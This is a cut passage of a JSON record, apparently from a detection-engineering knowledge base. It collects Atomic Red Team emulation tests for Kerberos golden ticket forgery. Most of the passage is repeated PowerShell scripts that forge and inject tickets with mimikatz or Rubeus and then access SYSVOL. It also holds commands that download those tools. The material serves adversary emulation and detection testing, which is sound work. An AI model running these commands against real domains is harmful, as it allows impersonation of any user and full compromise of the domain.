$env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code 
from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\%userdnsdomain%\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat 
-ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:goldenticketfakeuser /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction 
Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop 
so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n $env:TEMP\\mimikatz\\x64\\mimikatz.exe \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a 
bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$($ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\") /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$($ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\")\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until 
the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:$ENV:username /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output 
file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? 
{$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"$Env:temp\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? 
{$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"$Env:temp\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\rubeus.exe\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? 
{$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\rubeus.exe\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? 
{$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1558.001", + "display_name": "Steal or Forge Kerberos Tickets: Golden Ticket", + "atomic_tests": [ + { + "name": "Crafting Active Directory golden tickets with mimikatz", + "auto_generated_guid": "9726592a-dabc-4d4d-81cd-44070008b3af", + "description": "Once the hash of the special 
krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.\nThis test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).\nThe generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain_sid": { + "description": "SID of the targeted domain, if you keep default it will automatically get the current domain SID", + "type": "String", + "default": "S-1-5-21-DEFAULT" + }, + "domain": { + "description": "Targeted Active Directory domain FQDN", + "type": "String", + "default": "%userdnsdomain%" + }, + "account": { + "description": "Account to impersonate", + "type": "String", + "default": "goldenticketfakeuser" + }, + "krbtgt_aes256_key": { + "description": "Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain)", + "type": "String", + "default": "b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9" + }, + "mimikatz_path": { + "description": "Mimikatz windows executable", + "type": "Path", + "default": "$env:TEMP\\mimikatz\\x64\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest 
\"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe $mimikatz_path -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so 
the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n" + } + }, + { + "name": "Crafting Active Directory golden tickets with Rubeus", + "auto_generated_guid": "e42d33cd-205c-4acf-ab59-a9f38f6bad9c", + "description": "Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.\nThis test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).\nThe generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domaincontroller": { + "description": "Targeted Active Directory domain FQDN", + "type": "String", + "default": "$ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\"" + }, + "account": { + "description": "Account to impersonate", + "type": "String", + "default": "$ENV:username" + }, + "krbtgt_aes256_key": { + "description": "Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain)", + "type": "String", + "default": "b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9" + }, + "local_folder": { + "description": "Local path of Rubeus executable", + "type": "Path", + "default": "$Env:temp" + }, + "local_executable": { + "description": "name of the rubeus executable", + "type": "String", + "default": "rubeus.exe" + }, + "rubeus_url": { + "description": "URL of Rubeus executable", + "type": "Url", + 
"default": "https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + }, + { + "description": "Rubeus must exist\n", + "prereq_command": "if(Test-Path -Path #{local_folder}\\#{local_executable}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\\#{local_executable}\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? 
{$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active 
